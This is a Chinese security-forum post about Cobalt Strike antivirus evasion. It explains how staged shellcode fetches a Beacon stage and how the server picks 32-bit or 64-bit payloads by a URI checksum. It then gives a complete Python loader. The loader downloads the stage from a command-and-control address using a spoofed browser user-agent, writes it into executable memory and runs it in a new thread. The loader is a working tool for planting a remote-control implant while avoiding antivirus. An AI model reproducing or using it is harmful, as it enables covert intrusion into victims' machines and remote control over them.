安全矩阵

 找回密码
 立即注册
搜索
查看: 2181|回复: 0

CS免杀-实现shellcode拉取stage

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2021-4-20 21:09:31 | 显示全部楼层 |阅读模式
原文链接:CS免杀-实现shellcode拉取stage

Shellcode原理


通常我们使用CS生成payload后,都是利用加载器将payload放在内存中运行



但payload是如何与CS服务器通信的,我们不是很了解,因为生成的payload是一串机器码,没有反汇编能力的很难看懂其中的原理。

当我网上查资料发现,原来CS生成的shellcode是使用wininet库实现的加载器,用来下载对应的stage(Beacon),并将stage注入到内存中去。

看到这就懂了,就是我们的加载器加载了一个shellcode写的加载器,用来拉取CS的stage,典型套娃啊。
源码


但是这里的访问stage不是随便访问的。CS客户端会判断我们的请求,请求正确才会返回给我们stage数据。
看一下CS的源码啊


在CS的源码中,会根据访问的URI,经过一系列操作checksum8()是否等于92或93来判断访问。
等于92返回32位beacon,等于93返回64位beacon,都不等于则访问失败。

当然,每个人配置不同也会同时根据访问url或user-agent等判断。


这里我生成两个exe文件,一个32位,一个64位
可以看到URI为/trF4时CS判断为32位,为/Ln5r时判断为64位


这样访问http://192.168.10.1:8989/Ln5r就会返回给我们64位的stage(Beacon)

加载器


这样我们可以通过py将stage写入内存实现CS上线
  1. import ctypes
  2. import requests

  3. headers = {
  4.     'User-Agent': "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)",
  5. }
  6. shellcode = requests.get("http://192.168.10.1:8989/Ln5r", headers=headers)
  7. shellcode = bytearray(shellcode.content)

  8. ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
  9. ptr = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x3000, 0x40)

  10. buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
  11. ctypes.windll.kernel32.RtlMoveMemory(ptr,buf,len(shellcode))

  12. handle = ctypes.windll.kernel32.CreateThread(0, 0, ptr, 0, 0, 0)
  13. ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
复制代码


注意URI根据自己CS的配置来,可以先生成64位exe,看它访问的URI是多少
加载器目前只能实现64位上线,32位有空再搞搞。

然后可以将py代码转成汇编,再转成shellcode,有会转shellcode的大佬可以教教我。





















回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-29 00:34 , Processed in 0.014088 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表